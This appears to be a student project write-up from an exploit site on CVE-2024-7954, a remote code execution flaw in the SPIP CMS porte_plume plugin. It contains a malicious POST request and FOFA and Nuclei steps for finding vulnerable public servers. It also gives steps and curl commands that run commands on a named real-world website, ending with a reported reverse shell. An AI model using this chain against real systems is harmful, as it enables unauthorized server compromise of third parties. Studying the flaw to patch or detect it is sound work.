## https://sploitus.com/exploit?id=258CE2BD-C301-5387-B3ED-EB38B94C7F6D
# Exploitation of Remote Code Execution Vulnerability (CVE-2024-7954)
**Software Vulnerability Testing Project**
**Submitted by:** *Shivansh Kuntal*
---
## Overview
This project demonstrates the exploitation of **CVE-2024-7954**, a critical Remote Code Execution (RCE) vulnerability affecting **SPIP CMS** through its `porte_plume` plugin.
The vulnerability allows **unauthenticated attackers** to execute arbitrary PHP code on the target server via crafted HTTP POST requests.
Testing was conducted in a **controlled local environment** and later extended to real-world reconnaissance using FOFA and Nuclei.
---
## 1. Environment Setup
A vulnerable version of **SPIP CMS**, confirmed to be affected by CVE-2024-7954, was deployed locally on an Apache server using a GitHub repository hosting known-vulnerable releases.
**Tools Used**
* Burp Suite (intercepting & modifying HTTP requests)
* Apache Web Server
* FOFA Search Engine
* Nuclei Vulnerability Scanner
* curl (CLI exploitation)
The SPIP homepage running on `localhost` validated successful installation and served as the target for exploitation.
---
## 2. Vulnerability Description
The **porte_plume** plugin (before versions 4.30-alpha2, 4.2.13, 4.1.16) is vulnerable due to insufficient sanitization of user-provided input.
Attackers can inject PHP code into specific form fields which is later rendered and executed by the server.
**Impact:**
Unauthenticated Remote Code Execution
**Severity:** Critical
**Attack Vector:** Network / HTTP POST
---
## 3. Proof of Concept (PoC)
### Malicious POST Request
```http
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL``]_BB
```
### Notes
* PHP code is injected inside the markdown formatting engine.
* Executed as the **SPIP user** on the server.
* Attack requires **no authentication**.
---
## 4. FOFA Reconnaissance
A FOFA query was used to enumerate public SPIP installations:
```
app="SPIP"
```
FOFA returned multiple metadata points:
* HTTP headers
* Titles
* IP addresses & geolocation
* Server technology stack
### Recon Value
1. **Target Enumeration:** Identify reachable SPIP CMS servers.
2. **Version Fingerprinting:** Determine if vulnerable plugin versions are active.
3. **Prioritization:** Select likely exploitable systems.
4. **Exploit Verification:** Validate endpoints using controlled payloads.
5. **Automation:** Export FOFA results into `targets.txt` for batch scanning.
A suitable real-world host identified:
```
http://www.comite-tricolore.org/
```
---
## 5. Automated Scanning with Nuclei
### Purpose
Since manual exploitation is slow, **Nuclei** was used to automate detection of CVE-2024-7954 across a large set of targets.
### Command (Custom Template)
```bash
nuclei -l targets.txt -t CVE-2024-7954.yaml
```
* `-l targets.txt` loads FOFA results
* `-t` loads custom PoC template
**Note:** Initial template returned *no matches*.
### Broad CVE Scan
```bash
nuclei -l targets.txt -t cves/
```
This scan identified one responsive target:
```
http://www.comite-tricolore.org/
```
---
## 6. Manual Validation & Exploitation
### Step 1 โ Inspect Vulnerable Endpoint
Visit:
```
http://www.comite-tricolore.org/spip.php?page=contact
```
Confirmed:
* Input fields for name, email, message
* POST request handler suitable for payload injection
### Step 2 โ Inject PHP Payload
Using Burp Suite or curl, modify the `message` parameter:
**Payload**
```php
```
### Step 3 โ Trigger Command Execution
Visit:
```
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id
```
Or using curl:
```bash
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"
```
Output confirmed remote command execution.
### Step 4 โ Reverse Shell (Final Access)
A crafted payload enables a reverse shell callback, allowing:
* `whoami`
* `ls`
* full interactive shell access
---
## 7. Critical Observations
* **Unauthenticated exploit** increases severity dramatically.
* **Input sanitization failure** in the plugin is the core issue.
* Once PHP is injected and rendered, **complete server compromise** is possible.
* Reverse shell โ potential privilege escalation โ server takeover.
* Attack is trivial to automate with curl, Python scripts, or Nuclei.
---
## 8. Conclusion
This project demonstrates the full exploitation chain for **CVE-2024-7954**, from reconnaissance to obtaining an interactive shell.
### Exploitation Path
1. Recon (FOFA)
2. Automated Scanning (Nuclei)
3. Manual Payload Injection
4. Verified Code Execution
5. Reverse Shell Access
### Security Lessons
* Strict input validation is mandatory for all user-controlled data.
* Plugins must follow secure coding practices.
* Organizations must apply security patches promptly.
* Regular vulnerability assessments are essential to prevent RCE attacks.
This vulnerability highlights how a seemingly harmless text formatting plugin can create a **complete system compromise** when improperly secured.